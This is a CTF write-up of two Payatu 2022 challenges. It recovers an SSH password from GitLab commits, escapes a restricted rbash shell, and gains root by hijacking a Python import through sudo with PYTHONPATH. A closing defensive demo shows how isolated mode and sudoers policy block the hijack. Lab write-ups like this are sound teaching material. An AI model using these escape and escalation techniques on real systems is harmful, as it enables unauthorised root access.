Payatu Hiring CTF 2022
Network 1,2 Writeup
Hello guys, today we are going to have a look at a cool Network x OSINT challenge from Payatu CTF 2022.
1. Mistake — 1
Category: Network
Points: 150
Mmm, Just an ordinary Site?
All of the hyperlinks are empty except the GitLab one.
The GitLab
From the above image we know that the username is saddetail.
- Let's dig through all the commits
https://gitlab.com/saddetail/my-portfolio/-/commit/4bb3cb9ccbfdd3df589ae82b0b2576a1cf380f0b
2. Of course, just another Base64!
GKxtH2IwqKWcqUxtD29hp3IfqTShqPOzpzyyozEmVTgyMKNtqTIfoTyhMlOgMFO0nTymVTymVUA0
qKOcMP4tDaI0VT9vqzyiqKAfrFO0nTymVTymVT5iqPOmqUIjnJDhVSEbMKxtLKWyVTc1p3DtMzIu
pz1iozqypaZfVUEbMKxtMJ52rFOgMFOvMJAuqKAyVRxtL29gMFO3nKEbVUA1L2ttL3WyLKEcqzHt
nJEyLKZhVSEbMKxtL2ShVUEun2HgLF1zMKpgpTSaMKZgMaWioF1grF1vo29eVTc1p3DtoTyeMFOgrFOjLKAmq29lMP4=
take-a-few-pages-from-my-book (password)
- So, we can conclude that it is the password for something
Back to the challenge description:
Note: When you find your way to the hotel, please note that Room № 22 is under repair, you can check in at Room № 9922 instead
The number 22 denotes SSH (its default port).
- All we need is a host to SSH into on the custom port number 9922
HOST: mistake.payatu.lol
❯ host mistake.payatu.lol
payatu.lol has address 34.237.41.18
(34.237.41.18 is also used to do SSH)
Hurray! We are in.
But we are restricted with RBASH.
Restricted shell: The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it.
[+] Bypassing the restriction
-t "bash --noprofile" can be used to bypass the restrictions:
ssh saddetail@34.237.41.18 -p 9922 -t "bash --noprofile"
[1] Reading the file even in the restricted mode
saddetail@6dbb2a245253:~$ echo "`<flag.txt`"
flag{w@tch_th0s3_3xtra_Co5mi3s}
[2] By bypassing the RBASH
flag{w@tch_th0s3_3xtra_Co5mi3s}
2. Mistake - 2
- So we need some privilege to read the flag.txt at /root
saddetail@6dbb2a245253:~$ ls
__pycache__ bin flag.txt
[+] Library hijacking using Python
saddetail@6dbb2a245253:/opt$ head script.py
try:
    import os
    import requests
    import dummy
except ImportError:
    print("Working Fine")

def add(x, y):
    return x + y
- Here, dummy is a custom library that we can create ourselves to exploit script.py
1. Create a file called dummy.py and write the payload in it
saddetail@6dbb2a245253:~$ cat dummy.py
import os
os.system("/bin/bash")
2. Let's set PYTHONPATH so that script.py, run through sudo, imports our dummy.py and gives us root privileges:
saddetail@6dbb2a245253:~$ sudo PYTHONPATH=/home/saddetail/ /usr/bin/python3 /opt/script.py
[I'M ROOT ! ]
root@6dbb2a245253:/home/saddetail# id
uid=0(root) gid=0(root) groups=0(root)
Cool!
root@6dbb2a245253:/home/saddetail# cat flag.txt
flag{w@tch_th0s3_3xtra_Co5mi3s}
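Why the PYTHONPATH step works, and how isolated mode closes it, shown as an added example that is not part of the original writeup or the challenge's code. Two temporary directories stand in for /opt and /home/saddetail, the script is a constructed copy of the import pattern above, and the ORIGIN marker in the benign dummy.py is hypothetical.

```python
import os
import subprocess
import sys
import tempfile

# Constructed stand-in for /opt/script.py: same try/except import pattern.
SCRIPT = """\
try:
    import dummy
    print(getattr(dummy, "ORIGIN", "system copy"))
except ImportError:
    print("Working Fine")
"""

# Benign stand-in for the user-supplied dummy.py: it only sets a marker.
USER_MODULE = 'ORIGIN = "user-writable copy"\n'


def run(script_path, user_dir, isolated):
    """Run the script with PYTHONPATH pointing at user_dir; return its stdout."""
    env = dict(os.environ, PYTHONPATH=user_dir)
    cmd = [sys.executable]
    if isolated:
        # -I ignores all PYTHON* variables and keeps the script's directory
        # and the user site directory off sys.path.
        cmd.append("-I")
    cmd.append(script_path)
    result = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
    return result.stdout.strip()


def demo():
    """Return (output with PYTHONPATH honoured, output in isolated mode)."""
    with tempfile.TemporaryDirectory() as opt_dir, \
            tempfile.TemporaryDirectory() as home_dir:
        script_path = os.path.join(opt_dir, "script.py")
        with open(script_path, "w") as fh:
            fh.write(SCRIPT)
        with open(os.path.join(home_dir, "dummy.py"), "w") as fh:
            fh.write(USER_MODULE)
        return (run(script_path, home_dir, isolated=False),
                run(script_path, home_dir, isolated=True))


if __name__ == "__main__":
    honoured, isolated = demo()
    print("PYTHONPATH honoured:", honoured)
    print("python3 -I         :", isolated)
```

For a script that is meant to be run through sudo, starting the interpreter with -I is one half of the fix; the other is a sudoers policy that does not let the caller pass PYTHONPATH through.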